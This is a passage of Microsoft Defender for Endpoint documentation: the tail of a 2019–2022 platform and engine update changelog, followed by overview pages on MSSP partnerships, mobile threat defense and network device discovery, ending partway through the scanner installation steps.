--- Added fix for ETW channel configuration for updates-- Added support for contextual exclusions allowing more specific exclusion targeting-- Fixed context maximum size-- Added fix for [ASR LSASS detection](attack-surface-reduction-rules-reference.md)-- Added fix to SHSetKnownFolder for rule exclusion logic-- Added AMSI disk usage limits for The History Store-- Added fix for Defender service refusing to accept signature updates-
-### Known issues
--- None-
-## March-2022 *UPDATE* (Platform: 4.18.2203.5 | Engine: 1.1.19200.5)
-
-*Customers who applied the March 2022 Microsoft Defender engine update (**1.1.19100.5**) might have encountered high resource utilization (CPU and/or memory). Microsoft has released an update (**1.1.19200.5**) that resolves the bugs introduced in the earlier version. Customers are recommended to update to at least this new engine build of Antivirus Engine (**1.1.19200.5**). To ensure any performance issues are fully fixed, it's recommended to reboot machines after applying update.*
--- Security intelligence update version: **1.363.817.0**-- Released: **April 22, 2022**-- Platform: **4.18.2203.5**-- Engine: **1.1.19200.5**-- Support phase: **Technical upgrade support (only)**-
-## What's new
--- Resolves issues with high resource utilization (CPU and/or memory) related to the earlier March 2022 Microsoft Defender engine update (1.1.19100.5)-
-### Known issues
--- None-
-## March-2022 (Platform: 4.18.2203.5 | Engine: 1.1.19100.5)
--- Security intelligence update version: **1.361.1449.0**-- Released: **April 7, 2022**-- Platform: **4.18.2203.5**-- Engine: **1.1.19100.5**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Added fix for an [attack surface reduction rule](attack-surface-reduction.md) that blocked an Outlook add-in-- Added fix for [behavior monitoring](configure-protection-features-microsoft-defender-antivirus.md) performance issue related to short live processes-- Added fix for [AMSI](/windows/win32/amsi/antimalware-scan-interface-portal) exclusion-- Improved [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) capabilities-- Added a fix for [real-time protection](configure-protection-features-microsoft-defender-antivirus.md) getting disabled in some cases when using `SharedSignaturesPath` config. For more information about the `SharedSignaturesPath` parameter, see [Set-MpPreference](/powershell/module/defender/set-mppreference).-
-### Known issues
--- Potential for high resource utilization (CPU and/or memory). See the Platform 4.18.2203.5 and Engine 1.1.19200.5 update for March 2022.-
-## February-2022 (Platform: 4.18.2202.4 | Engine: 1.1.19000.8)
--- Security intelligence update version: **1.361.14.0**-- Released: **March 14, 2022**-- Platform: **4.18.2202.4**-- Engine: **1.1.19000.8**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improvements to detection and behavior monitoring logic-- Fixed false positive triggering attack surface reduction detections-- Added fix resulting in better fidelity of EDR and Advanced Hunting detection alerts-- Defender no longer supports custom notifications on toast pop ups. Modified GPO/Intune/SCCM and docs to reflect this change.-- Improvements to capture both information and copy of files written to removable storage.-- Improved traffic output when SmartScreen service is unreachable-- Connectivity improvements for customers using proxies with authentication requirements-- Fixed VDI device update bug for network FileShares-- EDR in block mode now supports granular device targeting with new CSPs. See [Endpoint detection and response (EDR) in block mode](edr-in-block-mode.md).-
-### Known issues
--- None-
-## January-2022 (Platform: 4.18.2201.10 | Engine: 1.1.18900.2)
--- Security intelligence update version: **1.357.8.0**-- Released: **February 9, 2022**-- Platform: **4.18.2201.10**-- Engine: **1.1.18900.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Behavior monitoring improvements in filtering performance-- Hardening to TrustedInstaller-- Tamper protection improvements-- Replaced `ScanScheduleTime` with new `ScanScheduleOffest` cmdlet in [Set-MpPreference](/powershell/module/defender/set-mppreference). This policy configures the number of minutes after midnight to perform a scheduled scan.-- Added the `-ServiceHealthReportInterval` setting to [Set-MpPreference](/powershell/module/defender/set-mppreference). This policy configures the time interval (in minutes) to perform a scheduled scan.-- Added the `AllowSwitchToAsyncInspection` setting to [Set-MpPreference](/powershell/module/defender/set-mppreference). This policy enables a performance optimization that allows synchronously inspected network flows to switch to async inspection once they've been checked and validated.-- Performance Analyzer v2 updates: Remote PowerShell and PowerShell 7.x support added. See [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).-- Fixed potential duplicate packet bug in Microsoft Defender Antivirus network inspection system driver.-
-### Known issues
--- None-
-## November-2021 (Platform: 4.18.2111.5 | Engine: 1.1.18800.4)
--- Security intelligence update version: **1.355.2.0**-- Released: **December 9th, 2021**-- Platform: **4.18.2111.5**-- Engine: **1.1.18800.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improved CPU usage efficiency of certain intensive scenarios on Exchange servers-- Added new device control status fields under Get-MpComputerStatus in Defender PowerShell module.-- Fixed bug in which `SharedSignatureRoot` value couldn't be removed when set with PowerShell-- Fixed bug in which [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) failed to be enabled, even though Microsoft Defender for Endpoint indicated that tamper protection was turned on-- Added supportability and bug fixes to performance analyzer for Microsoft Defender Antivirus tool. For more information, see [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
- - PowerShell ISE support added for `New-MpPerformanceRecording`
- - Fixed bug errors for `Get-MpPerformanceReport -TopFilesPerProcess`
- - Fixed performance recording session leak when using `New-MpPerformanceRecording` in PowerShell 7.x, remote sessions, and PowerShell ISE
-
-### Known issues
--- None-
-## October-2021 (Platform: 4.18.2110.6 | Engine: 1.1.18700.4)
--- Security intelligence update version: **1.353.3.0**-- Released: **October 28th, 2021**-- Platform: **4.18.2110.6**-- Engine: **1.1.18700.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improvements to file transfer protocol (FTP) network traffic coverage-- Fix to reduce Microsoft Defender CPU usage in Exchange Server running on Windows Server 2016-- Fix for scan interruptions-- Fix for alerts on blocked tampering attempts not appearing in Security Center-- Improvements to tamper resilience in Microsoft Defender service-
-### Known issues
--- None-
-## September-2021 (Platform: 4.18.2109.6 | Engine: 1.1.18600.4)
--- Security intelligence update version: **1.351.7.0**-- Released: **October 7th, 2021**-- Platform: **4.18.2109.6**-- Engine: **1.1.18600.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- New delay ring for Microsoft Defender Antivirus engine and platform updates. Devices that opt into this ring receives updates with a 48-hour delay. The new delay ring is suggested for critical environments only. See [Manage the gradual rollout process for Microsoft Defender updates](manage-gradual-rollout.md).-- Improvements to Microsoft Defender update gradual rollout process-
-### Known issues
--- None-
-## August-2021 (Platform: 4.18.2108.7 | Engine: 1.1.18500.10)
--- Security intelligence update version: **1.349.22.0**-- Released: **September 2, 2021**-- Platform: **4.18.2108.7**-- Engine: **1.1.18500.10**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improvements to the behavior monitoring engine-- Released new [performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)-- Microsoft Defender Antivirus hardened against loading malicious DLLs-- Microsoft Defender Antivirus hardened against the TrustedInstaller bypass-- Extending file change notifications to include more data for Human-Operated Ransomware (HumOR)-
-### Known issues
--- None-
-## July-2021 (Platform: 4.18.2107.4 | Engine: 1.1.18400.4)
--- Security intelligence update version: **1.345.13.0**-- Released: **August 5, 2021**-- Platform: **4.18.2107.4**-- Engine: **1.1.18400.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Device control support added for Windows Portable Devices-- Potentially unwanted applications (PUA) protection is turned on by default for consumers (See [Block potentially unwanted applications with Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus).)-- Scheduled scans for Group Policy Object managed systems adhere to user configured scan time-- Improvements to the behavior monitoring engine-
-### Known issues
--- None-
-## June-2021 (Platform: 4.18.2106.5 | Engine: 1.1.18300.4)
--- Security intelligence update version: **1.343.17.0**-- Released: **June 28, 2021**-- Platform: **4.18.2106.5**-- Engine: **1.1.18300.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- New controls for managing the gradual rollout process of Microsoft Defender updates. See [Manage the gradual rollout process for Microsoft Defender updates](manage-gradual-rollout.md).-- Improvement to the behavior monitoring engine-- Improvements to the rollout of antimalware definitions-- Extended Microsoft Edge network event inspections-
-### Known issues
--- None-
-## May-2021 (Platform: 4.18.2105.4 | Engine: 1.1.18200.4)
--- Security intelligence update version: **1.341.8.0**-- Released: **June 3, 2021**-- Platform: **4.18.2105.4**-- Engine: **1.1.18200.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improvements to [behavior monitoring](client-behavioral-blocking.md)-- Fixed [network protection](network-protection.md) notification filtering feature-
-### Known issues
--- None-
-## April-2021 (Platform: 4.18.2104.14 | Engine: 1.1.18100.5)
--- Security intelligence update version: **1.337.2.0**-- Released: **April 26, 2021** (Engine: 1.1.18100.6 released May 5, 2021)-- Platform: **4.18.2104.14**-- Engine: **1.1.18100.5**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- More behavior monitoring logic-- Improved kernel mode key logger detection-- Added new controls to manage the gradual rollout process for [Microsoft Defender updates](manage-gradual-rollout.md)-
-### Known issues
--- None-
-## March-2021 (Platform: 4.18.2103.7 | Engine: 1.1.18000.5)
--- Security intelligence update version: **1.335.36.0**-- Released: **April 2, 2021**-- Platform: **4.18.2103.7**-- Engine: **1.1.18000.5**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improvement to the Behavior Monitoring engine-- Expanded network brute-force-attack mitigations-- More failed tampering attempt event generation when [Tamper Protection](prevent-changes-to-security-settings-with-tamper-protection.md) is enabled-
-### Known issues
--- None-
-## February-2021 (Platform: 4.18.2102.3 | Engine: 1.1.17900.7)
--- Security intelligence update version: **1.333.7.0**-- Released: **March 9, 2021**-- Platform: **4.18.2102.3**-- Engine: **1.1.17900.7**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improved service recovery through [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md)-- Extend tamper protection scope-
-### Known issues
--- None-
-## January-2021 (Platform: 4.18.2101.9 | Engine: 1.1.17800.5)
--- Security intelligence update version: **1.327.1854.0**-- Released: **February 2, 2021**-- Platform: **4.18.2101.9**-- Engine: **1.1.17800.5**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Shellcode exploit detection improvements-- Increased visibility for credential stealing attempts-- Improvements in antitampering features in Microsoft Defender Antivirus services-- Improved support for ARM x64 emulation-- Fix: EDR Block notification remains in threat history after real-time protection performed initial detection-
-### Known issues
--- None-
-## November-2020 (Platform: 4.18.2011.6 | Engine: 1.1.17700.4)
--- Security intelligence update version: **1.327.1854.0**-- Released: **December 03, 2020**-- Platform: **4.18.2011.6**-- Engine: **1.1.17700.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improved [SmartScreen](/windows/security/threat-protection/microsoft-defender-smartscreen/microsoft-defender-smartscreen-overview) status support logging-
-### Known issues
--- None-
-## October-2020 (Platform: 4.18.2010.7 | Engine: 1.1.17600.5)
--- Security intelligence update version: **1.327.7.0**-- Released: **October 29, 2020**-- Platform: **4.18.2010.7**-- Engine: **1.1.17600.5**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- New descriptions for special threat categories-- Improved emulation capabilities-- Improved host address allow/block capabilities-- New option in Defender CSP to Ignore merging of local user exclusions-
-### Known issues
--- None-
-## September-2020 (Platform: 4.18.2009.7 | Engine: 1.1.17500.4)
--- Security intelligence update version: **1.325.10.0**-- Released: **October 01, 2020**-- Platform: **4.18.2009.7**-- Engine: **1.1.17500.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Admin permissions are required to restore files in quarantine-- XML formatted events are now supported-- CSP support for ignoring exclusion merges-- New management interfaces for:
- - UDP Inspection
- - Network Protection on Server 2019
- - IP Address exclusions for Network Protection
-- Improved visibility into TPM measurements-- Improved Office VBA module scanning-
-### Known issues
--- None-
-## August-2020 (Platform: 4.18.2008.9 | Engine: 1.1.17400.5)
--- Security intelligence update version: **1.323.9.0**-- Released: **August 27, 2020**-- Platform: **4.18.2008.9**-- Engine: **1.1.17400.5**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Add more telemetry events-- Improved scan event telemetry-- Improved behavior monitoring for memory scans-- Improved macro streams scanning-- Added `AMRunningMode` to Get-MpComputerStatus PowerShell cmdlet-- [DisableAntiSpyware](/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware) is ignored. Microsoft Defender Antivirus automatically turns itself off when it detects another antivirus program.-
-### Known issues
--- None-
-## July-2020 (Platform: 4.18.2007.8 | Engine: 1.1.17300.4)
--- Security intelligence update version: **1.321.30.0**-- Released: **July 28, 2020**-- Platform: **4.18.2007.8**-- Engine: **1.1.17300.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improved telemetry for BITS-- Improved Authenticode code signing certificate validation-
-### Known issues
--- None-
-## June-2020 (Platform: 4.18.2006.10 | Engine: 1.1.17200.2)
--- Security intelligence update version: **1.319.20.0**-- Released: **June 22, 2020**-- Platform: **4.18.2006.10**-- Engine: **1.1.17200.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Possibility to specify the [location of the support logs](./collect-diagnostic-data.md)-- Skipping aggressive catchup scan in Passive mode.-- Allow Defender to update on metered connections-- Fixed performance tuning when caching is disabled-- Fixed registry query-- Fixed scantime randomization in ADMX-
-### Known issues
--- None-
-## May-2020 (Platform: 4.18.2005.4 | Engine: 1.1.17100.2)
--- Security intelligence update version: **1.317.20.0**-- Released: **May 26, 2020**-- Platform: **4.18.2005.4**-- Engine: **1.1.17100.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improved logging for scan events-- Improved user mode crash handling.-- Added event tracing for Tamper protection-- Fixed AMSI Sample submission-- Fixed AMSI Cloud blocking-- Fixed Security update install log-
-### Known issues
--- None-
-## April-2020 (Platform: 4.18.2004.6 | Engine: 1.1.17000.2)
--- Security intelligence update version: **1.315.12.0**-- Released: **April 30, 2020**-- Platform: **4.18.2004.6**-- Engine: **1.1.17000.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- WDfilter improvements-- Add more actionable event data to attack surface reduction detection events-- Fixed version information in diagnostic data and WMI-- Fixed incorrect platform version in UI after platform update-- Dynamic URL intel for Fileless threat protection-- UEFI scan capability-- Extend logging for updates-
-### Known issues
--- None-
-## March-2020 (Platform: 4.18.2003.8 | Engine: 1.1.16900.2)
--- Security intelligence update version: **1.313.8.0**-- Released: **March 24, 2020**-- Platform: **4.18.2003.8**-- Engine: **1.1.16900.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- CPU Throttling option added to [MpCmdRun](./command-line-arguments-microsoft-defender-antivirus.md)-- Improve diagnostic capability-- reduce Security intelligence timeout (5 min)-- Extend AMSI engine internal log capability-- Improve notification for process blocking-
-### Known issues
--- [**Fixed**] Microsoft Defender Antivirus is skipping files when running a scan.-
-## February-2020 (Platform: - | Engine: 1.1.16800.2)
--- Security intelligence update version: **1.311.4.0**-- Released: **February 25, 2020**-- Platform/Client: **-**-- Engine: **1.1.16800.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- None-
-### Known issues
--- None-
-## January-2020 (Platform: 4.18.2001.10 | Engine: 1.1.16700.2)
--- Security intelligence update version: **1.309.32.0**-- Released: **January 30, 2020**-- Platform/Client: **4.18.2001.10**-- Engine: **1.1.16700.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Fixed BSOD on WS2016 with Exchange-- Support platform updates when TMP is redirected to network path-- Platform and engine versions are added to [WDSI](https://www.microsoft.com/en-us/wdsi/defenderupdates) <!-- The preceding URL must include "/en-us" -->-- extend Emergency signature update to [passive mode](./microsoft-defender-antivirus-compatibility.md)-- Fix 4.18.1911.3 hang-
-### Known issues
--- [**Fixed**] devices utilizing [modern standby mode](/windows-hardware/design/device-experiences/modern-standby) may experience a hang with the Windows Defender filter driver that results in a gap of protection. Affected machines appear to the customer as having not updated to the latest antimalware platform.-
-> [!IMPORTANT]
-> This update is:
-> - needed by RS1 devices running lower version of the platform to support SHA2;
-> - has a reboot flag for systems that have hanging issues;
-> - is re-released in April 2020 and will not be superseded by newer updates to keep future availability;
-> - is categorized as an update due to the reboot requirement; and
-> - is only be offered with [Windows Update](https://support.microsoft.com/help/4027667/windows-10-update).
-
-## November-2019 (Platform: 4.18.1911.3 | Engine: 1.1.16600.7)
--- Security intelligence update version: **1.307.13.0**-- Released: **December 7, 2019**-- Platform: **4.18.1911.3**-- Engine: **1.1.17000.7**-- Support phase: **No support**-
-### What's new
--- Fixed MpCmdRun tracing level-- Fixed WDFilter version info-- Improve notifications (PUA)-- add MRT logs to support files-
-### Known issues
--- When this update is installed, the device needs the jump package 4.18.2001.10 to be able to update to the latest platform version.
security Mssp Support https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mssp-support.md
- Title: Managed security service provider (MSSP) partnership opportunities
-description: Understand how Microsoft Defender for Endpoint integrates with managed security service providers (MSSP)
------- m365-security-- tier3- Previously updated : 12/18/2020--
-# Managed security service provider partnership opportunities
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-mssp-support-abovefoldlink)
--
-Security is recognized as a key component in running an enterprise, however some organizations might not have the capacity or expertise to have a dedicated security operations team to manage the security of their endpoints and network, others may want to have a second set of eyes to review alerts in their network.
--
-To address this demand, managed security service providers (MSSP) offer to deliver managed detection and response (MDR) services on top of Defender for Endpoint.
--
-Defender for Endpoint adds partnership opportunities for this scenario and allows MSSPs to take the following actions:
--- Get access to MSSP customer's Microsoft Defender portal-- Get email notifications, and -- Fetch alerts through security information and event management (SIEM) tools--
-## Related topic
-- [Configure managed security service provider integration](configure-mssp-support.md)-----
security Mtd https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mtd.md
- Title: Microsoft Defender for Endpoint - Mobile Threat Defense-
-description: Overview of Mobile Threat Defense in Microsoft Defender for Endpoint
--- Previously updated : 01/28/2024---- m365-security-- tier2---
-# Microsoft Defender for Endpoint - Mobile Threat Defense
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint on Android and iOS is our **mobile threat defense solution (MTD)**. Typically, companies are proactive in protecting PCs from vulnerabilities and attack while mobile devices often go unmonitored and unprotected. Where mobile platforms have built-in protection such as app isolation and vetted consumer app stores, these platforms remain vulnerable to web-based or other sophisticated attacks. As more employees use devices for work and to access sensitive information, it's imperative that companies deploy an MTD solution to protect devices and your resources from increasingly sophisticated attacks on mobiles.
-
-## Key capabilities
-
-Microsoft Defender for Endpoint on Android and iOS provides the below key capabilities, For information about the latest features and benefits, read our [announcements](https://aka.ms/mdeblog).
-
-|Capability|Description|
-|||
-|Web Protection|Anti-phishing, blocking unsafe network connections, and support for custom indicators for URLs and domains. (File and IP indicators are not currently supported.)|
-|Malware Protection (Android-only)|Scanning for malicious apps.|
-|Jailbreak Detection (iOS-only)|Detection of jailbroken devices.|
-|Microsoft Defender Vulnerability Management (MDVM) |Vulnerability assessment of onboarded mobile devices. Includes OS and Apps vulnerabilities assessment for both Android and iOS. Visit this [page](next-gen-threat-and-vuln-mgt.md) to learn more about Microsoft Defender Vulnerability Management in Microsoft Defender for Endpoint.|
-|Network Protection | Protection against rogue Wi-Fi related threats and rogue certificates; ability to allow list the root CA and private root CA certificates in Intune; establish trust with endpoints.|
-|Unified alerting|Alerts from all platforms in the unified M365 security console.|
-|Conditional Access, Conditional launch|Blocking risky devices from accessing corporate resources. Defender for Endpoint risk signals can also be added to app protection policies (MAM).|
-|Privacy Controls|Configure privacy in the threat reports by controlling the data sent by Microsoft Defender for Endpoint. Privacy controls are available for admin and end users. It's there for enrolled and unenrolled devices as well.|
-|Integration with Microsoft Tunnel|Integration with Microsoft Tunnel, a VPN gateway solution to enable security and connectivity in a single app. Available on both Android and iOS.|
-
-All these capabilities are available for Microsoft Defender for Endpoint license holders. For more information, see [Licensing requirements](minimum-requirements.md#licensing-requirements).
-
-## Overview and Deploy
-
-Deployment of Microsoft Defender for Endpoint on mobile can be done via Microsoft Intune. Watch this video for a quick overview of MTD capabilities and deployment:
-
-<br/>
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RWMpiC]
-
-### Deploy
-
-The following table summarizes how to deploy Microsoft Defender for Endpoint on Android and iOS. For detailed documentation, see
-- [Overview of Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md), and-- [Overview of Microsoft Defender for Endpoint on iOS](microsoft-defender-endpoint-ios.md)-
-**Android**
-
-|Enrollment type |Details |
-|--|-|
-|Android Enterprise with Intune |[Deploy on Android Enterprise enrolled devices](android-intune.md#deploy-on-android-enterprise-enrolled-devices)|
-|Device Administrator with Intune |[Deploy on Device Administrator enrolled devices](android-intune.md#deploy-on-device-administrator-enrolled-devices)|
-|Unmanaged BYOD OR devices managed by other enterprise mobility management / Set up app protection policy (MAM)|[Configure Defender risk signals in app protection policy (MAM)](android-configure-mam.md)|
-
-**iOS**
-
-|Enrollment type |Details |
-|--|-|
-|Supervised devices with Intune |1. [Deploy as iOS store app](ios-install.md)<br/>2. [Setup Web Protection without VPN for supervised iOS devices](ios-install.md#complete-deployment-for-supervised-devices)|
-|Unsupervised (BYOD) devices enrolled with Intune |[Deploy as iOS store app](ios-install.md)|
-|Unmanaged BYOD OR devices managed by other enterprise mobility management / Set up app protection policy (MAM)|[Configure Defender risk signals in app protection policy (MAM)](ios-install-unmanaged.md)|
-
-### End-user onboarding
--- [Configure Zero-touch onboard for iOS enrolled devices](ios-install.md#zero-touch-silent-onboarding-of-microsoft-defender-for-endpoint): Admins can configure zero-touch install to silently onboard Microsoft Defender for Endpoint on enrolled iOS devices without requiring the user to open the app. --- [Configure Conditional Access to enforce user onboarding](android-configure.md#conditional-access-with-defender-for-endpoint-on-android): This can be applied to ensure end-users onboard to the Microsoft Defender for Endpoint app after deploying. Watch this video for a quick demo on configuring conditional access with Defender for Endpoint risk signals. -
- <br/>
-
- > [!VIDEO https://www.microsoft.com/videoplayer/embed/RWMwR1]
-
-### Simplify Onboarding
--- [iOS - Zero-Touch Onboard](ios-install.md#zero-touch-silent-onboarding-of-microsoft-defender-for-endpoint)-- [Android Enterprise - Setup Always-on VPN](android-intune.md#auto-setup-of-always-on-vpn).-- [iOS - Auto-setup of VPN profile](ios-install.md#auto-onboarding-of-vpn-profile-simplified-onboarding)-
-## Pilot evaluation
-
-While evaluating mobile threat defense with Microsoft Defender for Endpoint, you can verify that certain criteria is met before proceeding to deploy the service to a larger set of devices. You can define the exit criteria and ensure that they're satisfied before deploying widely.
-
-This helps reduce potential issues that could arise while rolling out the service. Here are some tests and exit criteria that might help:
--- Devices show up in the device inventory list: After successful onboarding of Defender for Endpoint on the mobile device, verify that the device is listed in the Device Inventory in the [security console](https://security.microsoft.com).--- Run a malware detection test on an Android device: Install any test virus app from the Google play store and verify that it gets detected by Microsoft Defender for Endpoint. Here's an example app that can be used for this test: [Test virus](https://play.google.com/store/apps/details?id=com.antivirus&hl=en_US&gl=US). Note that on Android Enterprise with a work profile, only the work profile is supported.--- Run a phishing test: Browse to https://smartscreentestratings2.net and verify that it gets blocked by Microsoft Defender for Endpoint. Note that on Android Enterprise with a work profile, only the work profile is supported.--- Alerts appear in dashboard: Verify that alerts for above detection tests appear on the [security console](https://security.microsoft.com).-
-Need help in deploying or configuring Defender for Endpoint on Android & iOS? If you have at least 150 licenses for the product, use your [FastTrack benefits](/microsoft-365/fasttrack/introduction). Learn more about FastTrack at [Microsoft FastTrack](https://fasttrack.microsoft.com/).
-
-## Configure
--- [Configure Android features](android-configure.md)-- [Configure iOS features](ios-configure-features.md)-- [Configure Web Protection without VPN for supervised iOS devices](ios-install.md#complete-deployment-for-supervised-devices)-
-## Resources
--- [Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md)-- [Microsoft Defender for Endpoint on iOS](microsoft-defender-endpoint-ios.md)-- Stay informed about upcoming releases by reading our [announcements](https://aka.ms/mdeblog).-
security Network Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/network-devices.md
- Title: Network device discovery and vulnerability management
-description: Security recommendations and vulnerability detection are now available for operating systems of switches, routers, WLAN controllers, and firewalls.
------- m365-security-- tier1-- Previously updated : 04/03/2024--
-# Network device discovery and vulnerability management
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Defender Vulnerability Management](next-gen-threat-and-vuln-mgt.md)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-portaloverview-abovefoldlink)
-
-> [!NOTE]
-> The [Network device discovery and vulnerability assessments](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/network-device-discovery-and-vulnerability-assessments/ba-p/2267548) Blog \(published 04-13-2021\) provides insights into the new **Network device discovery** capabilities in Defender for Endpoint. This article provides an overview of the challenge that **Network device discovery** is designed to address, and detailed information about how get started using these new capabilities.
-
-Network discovery capabilities are available in the **Device inventory** section of the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> and Microsoft Defender XDR consoles.
-
-A designated Microsoft Defender for Endpoint device is used on each network segment to perform periodic authenticated scans of preconfigured network devices. Once discovered, vulnerability management capabilities in Defender for Endpoint provide integrated workflows to secure discovered switches, routers, WLAN controllers, firewalls, and VPN gateways.
-
-Once the network devices are discovered and classified, security administrators are able to receive the latest security recommendations and review recently discovered vulnerabilities on network devices deployed across their organizations.
-
-## Approach
-
-Network devices aren't managed as standard endpoints since Defender for Endpoint doesn't have a sensor built into the network devices themselves. These types of devices require an agentless approach where a remote scan obtains the necessary information from the devices. Depending on the network topology and characteristics, a single device or a few devices onboarded to Microsoft Defender for Endpoint performs authenticated scans of network devices using SNMP (read-only).
-
-There are two types of devices to keep in mind:
--- **Scanning device**: A device that's already onboarded that you use to scan the network devices.-- **Network devices**: The network devices you plan to scan and onboard.-
-### Vulnerability management for network devices
-
-Once the network devices are discovered and classified, security administrators are able to receive the latest security recommendations and review recently discovered vulnerabilities on network devices deployed across their organizations.
-
-## Operating systems that are supported
-
-The following operating systems are currently supported:
--- Cisco IOS, IOS-XE, NX-OS-- Fortinet FortiOS-- Juniper JUNOS-- HPE Aruba Networking ArubaOS, AOS-CX-- HPE ArubaOS, Procurve Switch Software-- Palo Alto Networks PAN-OS-
-More networking vendors and OS will be added over time, based on data gathered from customer usage. Therefore, you're encouraged to configure all your network devices, even if they're not specified in this list.
-
-## How to get started
-
-Your first step is to select a device that performs the authenticated network scans.
-
-1. Decide on a Defender for Endpoint onboarded device (client or server) that has a network connection to the management port for the network devices you plan on scanning.
-
-2. SNMP traffic between the Defender for Endpoint scanning device and the targeted network devices must be allowed (for example, by the Firewall).
-
-3. Decide which network devices are assessed for vulnerabilities (for example: a Cisco switch or a Palo Alto Networks firewall).
-
-4. Make sure SNMP read-only is enabled on all configured network devices to allow the Defender for Endpoint scanning device to query the configured network devices. 'SNMP write' isn't needed for the proper functionality of this feature.
-
-5. Obtain the IP addresses of the network devices to be scanned (or the subnets where these devices are deployed).
-
-6. Obtain the SNMP credentials of the network devices (for example: Community String, noAuthNoPriv, authNoPriv, authPriv). You're required to provide the credentials when configuring a new scan job.
-
-7. Proxy client configuration: No extra configuration is required other than the Defender for Endpoint device proxy requirements.
-
-8. To allow the scanner to be authenticated and work properly, it's essential that you add the following domains/URLs:
-
- - login.windows.net
- - \*.security.microsoft.com
- - login.microsoftonline.com
- - \*.blob.core.windows.net/networkscannerstable/\*
-
- > [!NOTE]
- > Not all URLs are specified in the Defender for Endpoint documented list of allowed data collection.
-
-## Permissions
-
-To configure scan jobs, the following user permission option is required: **Manage security settings in Defender**. You can find the permission by going to **Settings** \> **Roles**. For more information, see [Create and manage roles for role-based access control](user-roles.md).
-
-## Windows version pre-requisite for the scanner
-
-The scanner is supported on Windows 10, version 1903 and Windows Server, version 1903 and later. For more information, see [Windows 10, version 1903 and Windows Server, version 1903](https://support.microsoft.com/topic/windows-10-update-history-e6058e7c-4116-38f1-b984-4fcacfba5e5d).
-
-> [!NOTE]
-> There's a limit of 40 scanner installations per tenant.
-
-## Install the scanner
-
-1. Go to **Microsoft 365 security** \> **Settings** \> **Device discovery** \> **Authenticated scans**.
-
-2. Download the scanner and install it on the designated Defender for Endpoint scanning device.
-
- :::image type="content" source="../../media/defender-endpoint/network-authenticated-scan-new.png" alt-text="Screenshot of the add new authenticated scan screen" lightbox="../../media/defender-endpoint/network-authenticated-scan-new.png":::
-
-## Scanner installation & registration
-
-The signing-in process can be completed on the designated scanning device itself or any other device (for example, your personal client device).
-
-> [!NOTE]
